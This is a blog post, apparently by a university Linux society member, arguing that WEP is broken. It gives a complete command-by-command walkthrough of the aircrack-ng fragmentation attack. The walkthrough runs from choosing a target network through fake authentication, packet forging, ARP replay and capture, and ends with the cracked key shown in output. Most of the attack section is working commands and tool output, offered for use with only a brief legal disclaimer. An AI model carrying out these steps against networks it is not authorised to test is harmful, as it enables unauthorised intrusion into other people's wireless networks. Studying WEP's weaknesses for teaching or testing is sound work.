As the growth of wireless networks grows, the question of wifi security needs a constant eye of caution, and periods of re-evaluation. Encryption of wireless networks is nothing new in today's world, however two main encryption methods are deployed in today's home networks, and large amount of business networks. It has come to light in recent years that the first major adopted wireless encryption technology used namely WEP (Wired Equivalency Privacy) has a mayor flaws and now calls for it to be totally depreciated are being heard loud and clear. It has to be said frankly that WEP can no longer be relied on to secure a network, in the past you may have been able to argue that there was some real-time deterrence from attack you would be hard pushed to make that argument today. With the increase in WEP decryption technologies, the reality of cracking the encryption is a short process with certain efficiency, rather than a time consuming laborious task.
However the true reality of inherent weakness found within the WEP protocol where long known before it's widespread deployment. The worrying aspect of cracking WEP today, is that it can be done in literally a minute. Scientists from the Darmstadt Technical University broke the record for cracking WEP in 2007, and this was due to them cutting the amount of encrypted packets that need to be captured to crack WEP. Before they broke the record you would need to capture anything between half a million encrypted packets, to 2 million, they managed to cut this drastically to 40 thousand packets.
The main attack that i'm going to focus on is the fragmentation attack, here is a quick description;
This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack.
Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1500 bytes of PRGA are obtained or sometimes less then 1500 bytes.
The original paper, The Fragmentation Attack in Practice, by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located here. Here are presentation slides of a related paper. A local copy of the slides is located here. Also see the paper “The Final Nail in WEP's Coffin” on this page.
http://www.aircrack-ng.org/doku.php?id=fragmentation#description
The attack is very easy in practice, and really can be broken down into 10 or so steps. I have used my eee loaded with Ubuntu 8.04, however you can use BackTrack 3 or any distro, and the packages you need to find should be pretty easy to be honest. Please only use this for educational purposes. Please don't use this to break the law.
I have just done this on my system so your wireless devices may differ to mine
Firstly declare run kismet or what ever wireless scanner your using and find the network your going to hack. You need to find out some key bits of information; namely the Wireless Networks name, the AP's MAC address and what channel it is on. So in my case i found;
Finux-Wireless-Network, channel 13, BSSID MAC address 00-14-7F-9D-51-11
so i would suggest that we declare some variables in the shell before we start so that we're not constantly re-typing them in
in a terminal type
export AP=(MAC ADDRESS OF AP WITHOUT BRACKETS)
export WIFI=(MAC ADDRESS OF YOUR WIRELESS CARD, ATH1 IN MY CASE)
So first command
sudo airmon-ng start wifi0
airmon-ng - bash script designed to turn wireless cards into monitor mode
sudo wlanconfig ath0 destroy
wlanconfig description
sudo ifconfig ath1 up
sudo iwconfig ath1 mode monitor channel 13
This command puts your card into monitoring mode (rfmon) channel 13 (your channel may vary)
sudo aireplay-ng -1 0 -e Finux-Wireless-Network -a $AP -h $WIFI ath1
aireplay-ng injects specially generated ARP-request packets into an existing wireless network in order to generate traffic. By sending these ARP-request packets again and again, the target host will respond with encrypted replies, thus providing new and possibly weak IVs.
sudo aireplay-ng -5 -b $AP -h $WIFI ath1
This should produce a file in the directory your working in that should start fragment-*something*-*here*.xor
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment-*something*-*here*.xor
-w arp-request
packetforge-ng is a tool designed to forge ARP-request, UDP, ICMP or custom packets. You should find in file named arp-request was made in your working directory
sudo airodump-ng -c 13 --bssid $AP -w capture ath1
airodump-ng is a packet capture tool for aircrack-ng. It allows dumping packets directly from WLAN interface and saving them to a pcap or IVs file.
You will need to open another terminal and leave airodump-ng running, in the new terminal
sudo aireplay-ng -2 -r arp-request ath1
This uses the crafted arp-request we made with packetforge-ng, you will need to leave this running and open a new terminal
sudo aircrack-ng -z *.cap -z
aircrack-ng is a 802.11 WEP / WPA-PSK key cracker. It implements the so-called Fluhrer - Mantin - Shamir (FMS) attack, along with some new attacks by a talented hacker named KoreK. When enough encrypted packets have been gathered, aircrack-ng can almost instantly recover the WEP key.
This command will pull everything in you working directory that ends .cap and start cracking the wep key. You should get a window like this
Aircrack-ng 1.0 beta1
[00:03:58] Tested 793 keys (got 47545 IVs)
KB depth byte(vote)
0 4/ 5 7E(55296) 01(54528) B5(54528) 3C(53760) B9(53760)
1 4/ 1 46(54528) 2D(54016) A8(53504) D3(53504) DD(53248)
2 1/ 7 AE(57088) 66(55552) 98(55552) A5(55552) 01(55040)
3 18/ 3 F8(53248) 36(52992) 4D(52992) 9C(52736) E7(52736)
4 0/ 1 B9(69120) 4B(56832) 5B(56576) 16(56064) D0(55040)
KEY FOUND! [ 73:4F:39:51:6D:58:69:6E:77:2C:64:6D:21 ] (ASCII: sO9QmXinw,dm! )
Decrypted correctly: 100%
And that's wep hacked in less than five minutes with no clients attached to the network
~~~~~~~~~~
URL's Interesting Bit's
~~~~~~~~~~
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
http://blip.tv/file/625845
http://www.offensive-security.com/movies/frag-final/frag-final.html
http://wireless-comm.blogspot.com/2008/05/10-easy-steps-to-crack-wireless-wep.html
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1836.0/
http://forums.remote-exploit.org/showthread.php?t=8339
http://www.informit.com/guides/content.aspx?g=security&seqNum=305&f1=rss
http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
http://ubuntuforums.org/showthread.php?t=763911
http://forums.remote-exploit.org/showthread.php?t=9457
http://oxid.netsons.org/phpBB2/viewtopic.php?t=2301&start=0&postdays=0&postorder=asc&highlight=&sid=7ee2752430f64d44fc02b0a327d7221c
http://www.youtube.com/results?search_query=wep+fragmentation+attack&search_type=
http://www.eweek.com/c/a/Mobile-and-Wireless/The-Final-Final-Nail-in-WEPs-Coffin/
Delicious
Digg
StumbleUpon
Comments
here's the hpr episode
http://www.hackerpublicradio.org/eps/hpr0161.mp3
Arron M Finnon
President Abertay Linux Society